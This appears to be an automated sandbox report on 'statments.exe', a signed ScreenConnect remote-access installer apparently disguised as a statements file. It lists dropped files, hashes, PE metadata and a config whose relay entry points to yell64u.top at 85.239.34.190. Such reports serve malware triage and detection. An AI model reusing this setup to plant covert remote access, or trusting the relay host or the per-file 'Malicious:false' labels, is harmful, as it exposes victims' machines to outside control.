                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:MS Windows icon resource - 3 icons, 16x16 with PNG image data, 45 x 45, 8-bit/color RGBA, non-interlaced, 4 bits/pixel, 32x32 with PNG image data, 45 x 45, 8-bit/color RGBA, non-interlaced, 4 bits/pixel
                                                                                  Category:dropped
                                                                                  Size (bytes):7668
                                                                                  Entropy (8bit):7.864444854228408
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:NN78fxDBmgwVRjuzFN78fxDBmgwVRjuzFN78fxDBmgwVRjuzc:NN78dB742N78dB742N78dB74d
                                                                                  MD5:55A6B0132343F5FC425515F0E29A5A53
                                                                                  SHA1:CC8FE5C184EBB14AD6D835D8E743F4FC2678CB10
                                                                                  SHA-256:A6663FB9874ABA9B9C1958D2D17470B73E1C95621A503454B2D0F941F989EAA6
                                                                                  SHA-512:4F57298141165351CCE82CCCD9CAE456591253C9BEB753645D92B73D933F8405CD22011FC0E8C488A2CD3D3B54C7AF327F2869432EE92C1C41B0F4474D6C6BE9
                                                                                  Malicious:false
                                                                                  Preview:..................6... .......... ...00...............PNG........IHDR...-...-.....:......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs...:...:..d.J...NIDATX...{pT.......$\..................h.m+Z.....I.R.... X.E...V+.^.......i...F.;..IDH..?.l. ..S.qxg2...}.../.y.......r1E..?......*.K[...D.../L....u..n....$!R..Jh...?.dSUX..*.V%..Jy.-.m#x....X.rYn....R_.ds...*.*......V..x[$]..}.*..b...". ...,....*|.F`.....E[`\6...G.m..$.K...IxAb..^."....@.^..G....bK.....F.+.E.*..p......2WBk......8...p......_u.mR.6.......xs.....jHX.)l....KA..F...u_}.G.pF.`.i....K..JQ.C..cc..[..-06.d{...%TtG..'.....9.W5W.~)..Qlx.d.gT....gX.#L..4{......cG..h..$...ie.....W..)X...#o..dku..[.VQp..c?...........)..+w.p.H....I...:...r...6?....V...{.R...?.w..i......sC[..R.t!_v.A.....-kzL.8...d.(..6I.....&.R..1.....p.?.Vt..@>^....{p.s.[..c9.k~k.B....(.......%=........x6.6*:..Vu.. ......".;g..f....o}..+..n.w..%.j.0...X:.^...o....$.8@M]B..J..R.. ..a....n.<.
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):360001
                                                                                  Entropy (8bit):5.362984411334502
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgaun:zTtbmkExhMJCIpEy
                                                                                  MD5:8D182B94B35529E9932F70DD98D067B2
                                                                                  SHA1:12D901F049C91399091E8EDA5D820DE4865CF426
                                                                                  SHA-256:4FDA9010752563BDDD19445BD4A4AC27E240348A1CF13A32DC6C7B7814248FCE
                                                                                  SHA-512:24FDBD962EBD1E91BB322EA3096FF4B71A79AC0C7F522D505680DACEA9055107A169E02C044AE0D64907279D13B7806F4D53E3C1385C898F402E184653AAF59F
                                                                                  Malicious:false
                                                                                  Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                                                  Process:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:modified
                                                                                  Size (bytes):556
                                                                                  Entropy (8bit):5.041874079037299
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOIUiGA/vXbAa3xT:2dL9hK6E46YP6JvH
                                                                                  MD5:4C83DC29C68E989B7DF112C227D50980
                                                                                  SHA1:BBC5D1ADF9B19A033C5632174E89C2F846F9580A
                                                                                  SHA-256:CC9A698161398A3FD98FD4136C135C9FB4000D8F047B89BE4F9576C1876BE356
                                                                                  SHA-512:B8CB3DD8CAB4AB32BB7FF352ADC29A6F8E0CBD7B6C2CE2B26A27C5634233749BE66BA2064176355390F54AC545DA28C68FFE15DBCB4ED5B1C763A41A2A444108
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>yell64u.top=85.239.34.190-17%2f10%2f2024%2018%3a03%3a22</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                  Process:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):556
                                                                                  Entropy (8bit):5.041874079037299
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOIUiGA/vXbAa3xT:2dL9hK6E46YP6JvH
                                                                                  MD5:4C83DC29C68E989B7DF112C227D50980
                                                                                  SHA1:BBC5D1ADF9B19A033C5632174E89C2F846F9580A
                                                                                  SHA-256:CC9A698161398A3FD98FD4136C135C9FB4000D8F047B89BE4F9576C1876BE356
                                                                                  SHA-512:B8CB3DD8CAB4AB32BB7FF352ADC29A6F8E0CBD7B6C2CE2B26A27C5634233749BE66BA2064176355390F54AC545DA28C68FFE15DBCB4ED5B1C763A41A2A444108
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>yell64u.top=85.239.34.190-17%2f10%2f2024%2018%3a03%3a22</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                  Process:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1590
                                                                                  Entropy (8bit):5.363907225770245
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:MxHKQ71qHGIs0HKEHiYHKGSI6oPtHTHhAHKKkhHNpv:iq+wmj0qECYqGSI6oPtzHeqKkhtpv
                                                                                  MD5:E88F0E3AD82AC5F6557398EBC137B0DE
                                                                                  SHA1:20D4BBBE8E219D2D2A0E01DA1F7AD769C3AC84DA
                                                                                  SHA-256:278AA1D32C89FC4CD991CA18B6E70D3904C57E50192FA6D882959EB16F14E380
                                                                                  SHA-512:CA6A7AAE873BB300AC17ADE2394232E8C782621E30CA23EBCE8FE65EF2E5905005EFD2840FD9310FBB20D9E9848961FAE2873B3879FCBC58F8A6074337D5802D
                                                                                  Malicious:false
                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):512
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3::
                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                  Malicious:false
                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):512
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3::
                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                  Malicious:false
                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):1.797639887720556
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:P8PhVuRc06WX4IFT5tp97qcq56AduNSiAUadZq+ommXrz4VWC5r2AduNSID:OhV14FTvWpYfbadwLmm34C
                                                                                  MD5:3945D7F3025C6E8C25805D401F82E6C8
                                                                                  SHA1:D5AB4D0DC97DFCE6B90E3F65E073CE746EABC516
                                                                                  SHA-256:6E69A138D6BBD179A8A45394CE5691C60C5B12D3F2044AA07233EAA6BDE9C8C3
                                                                                  SHA-512:3A7D70BC3599DF092DE9F67710A84E98C807E3F49C1A2979A62C5B99040F718A29429C48DFA011B5BE59A2402BF9577CA9495E275A1DE41DBFEB16CDE8B37746
                                                                                  Malicious:false
                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):512
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3::
                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                  Malicious:false
                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):32768
                                                                                  Entropy (8bit):1.4186244894791478
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:x4tu9O+xFX4NT5hU0p97qcq56AduNSiAUadZq+ommXrz4VWC5r2AduNSID:StmOTXhWpYfbadwLmm34C
                                                                                  MD5:7E2EA820258E3BD25958E841EA798CCA
                                                                                  SHA1:44A2068B156BE583FF22BCFE6CEDFA2B3728B4E9
                                                                                  SHA-256:34D96399928E94616D3CC1610EEBDFA95CDBEB1C98A2FD2FA39EE2333BE84992
                                                                                  SHA-512:6FF8E49EBC8A9CF429986789D7EC5E3C0CC3FED87A9FEB5C9BC174BA6998417AD0ECDFFCCE2194868FDBC9D599FD19BB6A42B56F8605A682F373F56625CC7491
                                                                                  Malicious:false
                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):512
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3::
                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                  Malicious:false
                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):32768
                                                                                  Entropy (8bit):1.4186244894791478
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:x4tu9O+xFX4NT5hU0p97qcq56AduNSiAUadZq+ommXrz4VWC5r2AduNSID:StmOTXhWpYfbadwLmm34C
                                                                                  MD5:7E2EA820258E3BD25958E841EA798CCA
                                                                                  SHA1:44A2068B156BE583FF22BCFE6CEDFA2B3728B4E9
                                                                                  SHA-256:34D96399928E94616D3CC1610EEBDFA95CDBEB1C98A2FD2FA39EE2333BE84992
                                                                                  SHA-512:6FF8E49EBC8A9CF429986789D7EC5E3C0CC3FED87A9FEB5C9BC174BA6998417AD0ECDFFCCE2194868FDBC9D599FD19BB6A42B56F8605A682F373F56625CC7491
                                                                                  Malicious:false
                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):512
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3::
                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                  Malicious:false
                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):32768
                                                                                  Entropy (8bit):0.06903911476825685
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOh2WwcT2OCEyVky6l3X:2F0i8n0itFzDHF8RcT/C23X
                                                                                  MD5:B4F36FE6E570C8C2221AC99E5CF5FA20
                                                                                  SHA1:F0073426E2DF8F7FA7E0504FD7D359FDFF27BA69
                                                                                  SHA-256:F633F01C710EA8D371C18368996F0FF4CBCACDAE0A9CFA88718CA9C8D368D6F0
                                                                                  SHA-512:294B3FCCD8EDDE329E3F1A16EB39CE38971E2A3C94FCBCE767AAA31712320F00643250E74E1753F71E538258F1B730CDD3AAE0A44E2C054FD60DD8BCB4057ED1
                                                                                  Malicious:false
                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):32768
                                                                                  Entropy (8bit):1.4186244894791478
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:x4tu9O+xFX4NT5hU0p97qcq56AduNSiAUadZq+ommXrz4VWC5r2AduNSID:StmOTXhWpYfbadwLmm34C
                                                                                  MD5:7E2EA820258E3BD25958E841EA798CCA
                                                                                  SHA1:44A2068B156BE583FF22BCFE6CEDFA2B3728B4E9
                                                                                  SHA-256:34D96399928E94616D3CC1610EEBDFA95CDBEB1C98A2FD2FA39EE2333BE84992
                                                                                  SHA-512:6FF8E49EBC8A9CF429986789D7EC5E3C0CC3FED87A9FEB5C9BC174BA6998417AD0ECDFFCCE2194868FDBC9D599FD19BB6A42B56F8605A682F373F56625CC7491
                                                                                  Malicious:false
                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):1.797639887720556
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:P8PhVuRc06WX4IFT5tp97qcq56AduNSiAUadZq+ommXrz4VWC5r2AduNSID:OhV14FTvWpYfbadwLmm34C
                                                                                  MD5:3945D7F3025C6E8C25805D401F82E6C8
                                                                                  SHA1:D5AB4D0DC97DFCE6B90E3F65E073CE746EABC516
                                                                                  SHA-256:6E69A138D6BBD179A8A45394CE5691C60C5B12D3F2044AA07233EAA6BDE9C8C3
                                                                                  SHA-512:3A7D70BC3599DF092DE9F67710A84E98C807E3F49C1A2979A62C5B99040F718A29429C48DFA011B5BE59A2402BF9577CA9495E275A1DE41DBFEB16CDE8B37746
                                                                                  Malicious:false
                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):69632
                                                                                  Entropy (8bit):0.2329722313314201
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:5DBAduNS3qcq56AduNSiAUadZq+ommXrz4VWC5rZPp:9xpYfbadwLmm34l
                                                                                  MD5:DE35F73B4B2605A4B97E94EC2CC56FFE
                                                                                  SHA1:5CADC350B23DCC4C30EB9BD14AE51D7F2D5C3513
                                                                                  SHA-256:7F589D4EBC346293855E09E54CCF321899A53FFF9280E229D53D6AE040DFB805
                                                                                  SHA-512:A2DE3C2308943EF412BFE819B4C82B3F9E34A59568C4103AB59DF4DCCF730DF2D703A72010F1682A129B6BBDC8DEC9768100B149EB88651AADAE46CDCD1DDD88
                                                                                  Malicious:false
                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Entropy (8bit):7.429483239962031
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                  • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:statments.exe
                                                                                  File size:5'652'448 bytes
                                                                                  MD5:95c83010549bc9fe36a625307cf6cd8d
                                                                                  SHA1:67cf78f35d20ba6a07ce771f6092f1efd314e122
                                                                                  SHA256:85276b1893f8307a681f8c8b22c6d7eaa40620afcf987a7a22a4ab39f7300253
                                                                                  SHA512:17e7a37cb3cecfe5c1d19d7e67b91b14dfec17301866d1521a770ecbf4dae87c33776188b420dea2ac437ca101ceae068087eacf712f490ac5a7289e152bff7a
                                                                                  SSDEEP:49152:IDex5xKkEJkGYYpT0+TFiH7efP0x58IJL+md3rHgDNMKLo8SsxG/XcW32gqkAfob:c4s6efPQ53JLbd3LINMLaGUW39f0
                                                                                  TLSH:E846E111B3D995B9C0BF063CD87A52699A74BC048722C7AF57D4BD292D32BC05E323B6
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`.....O>`.....?>`.....]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF..A>`.[l..F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`........
                                                                                  Icon Hash:00928e8e8686b000
                                                                                  Entrypoint:0x4014ad
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:true
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x6377E6AC [Fri Nov 18 20:10:20 2022 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:5
                                                                                  OS Version Minor:1
                                                                                  File Version Major:5
                                                                                  File Version Minor:1
                                                                                  Subsystem Version Major:5
                                                                                  Subsystem Version Minor:1
                                                                                  Import Hash:9771ee6344923fa220489ab01239bdfd
                                                                                  Signature Valid:true
                                                                                  Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                  Signature Validation Error:The operation completed successfully
                                                                                  Error Number:0
                                                                                  Not Before, Not After
                                                                                  • 17/08/2022 02:00:00 16/08/2025 01:59:59
                                                                                  Subject Chain
                                                                                  • CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                                                                  Version:3
                                                                                  Thumbprint MD5:AAE704EC2810686C3BF7704E660AFB5D
                                                                                  Thumbprint SHA-1:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
                                                                                  Thumbprint SHA-256:82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
                                                                                  Serial:0B9360051BCCF66642998998D5BA97CE
                                                                                  Instruction
                                                                                  call 00007F0F58B96F7Ah
                                                                                  jmp 00007F0F58B96A2Fh
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  push 00000000h
                                                                                  call dword ptr [0040D040h]
                                                                                  push dword ptr [ebp+08h]
                                                                                  call dword ptr [0040D03Ch]
                                                                                  push C0000409h
                                                                                  call dword ptr [0040D044h]
                                                                                  push eax
                                                                                  call dword ptr [0040D048h]
                                                                                  pop ebp
                                                                                  ret
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  sub esp, 00000324h
                                                                                  push 00000017h
                                                                                  call dword ptr [0040D04Ch]
                                                                                  test eax, eax
                                                                                  je 00007F0F58B96BB7h
                                                                                  push 00000002h
                                                                                  pop ecx
                                                                                  int 29h
                                                                                  mov dword ptr [004148D8h], eax
                                                                                  mov dword ptr [004148D4h], ecx
                                                                                  mov dword ptr [004148D0h], edx
                                                                                  mov dword ptr [004148CCh], ebx
                                                                                  mov dword ptr [004148C8h], esi
                                                                                  mov dword ptr [004148C4h], edi
                                                                                  mov word ptr [004148F0h], ss
                                                                                  mov word ptr [004148E4h], cs
                                                                                  mov word ptr [004148C0h], ds
                                                                                  mov word ptr [004148BCh], es
                                                                                  mov word ptr [004148B8h], fs
                                                                                  mov word ptr [004148B4h], gs
                                                                                  pushfd
                                                                                  pop dword ptr [004148E8h]
                                                                                  mov eax, dword ptr [ebp+00h]
                                                                                  mov dword ptr [004148DCh], eax
                                                                                  mov eax, dword ptr [ebp+04h]
                                                                                  mov dword ptr [004148E0h], eax
                                                                                  lea eax, dword ptr [ebp+08h]
                                                                                  mov dword ptr [004148ECh], eax
                                                                                  mov eax, dword ptr [ebp-00000324h]
                                                                                  mov dword ptr [00414828h], 00010001h
                                                                                  Programming Language:
                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                  • [IMP] VS2008 build 21022
                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x129c40x50.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x533080.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x5462000x1dde0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x54a0000xea8.reloc
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x11f200x70.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x11e600x40.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0xd0000x13c.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x10000xb1af0xb200d9fa6da0baf4b869720be833223490cbFalse0.6123156601123596data6.592039633797327IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  .rdata0xd0000x60780x62008b45a1035c0de72f910a75db7749f735False0.41549744897959184data4.786621464556291IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .data0x140000x11e40x8001f4cc86b6735a74429c9d1feb93e2871False0.18310546875data2.265083745848167IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .rsrc0x160000x5330800x5332000cb59c276652808eb7200fdad38bae5bunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .reloc0x54a0000xea80x1000a93b0f39998e1e69e5944da8c5ff06b1False0.72265625data6.301490309336801IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                  FILES0x163d80x86000PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.39622565881529853
                                                                                  FILES0x9c3d80x1a4600PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.5111637115478516
                                                                                  FILES0x2409d80x1ac00PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.4415614047897196
                                                                                  FILES0x25b5d80x2ec320PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows0.9812068939208984
                                                                                  FILES0x5478f80x1600PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows0.3908025568181818
                                                                                  RT_MANIFEST0x548ef80x188XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5892857142857143
                                                                                  DLLImport
                                                                                  mscoree.dllCorBindToRuntimeEx
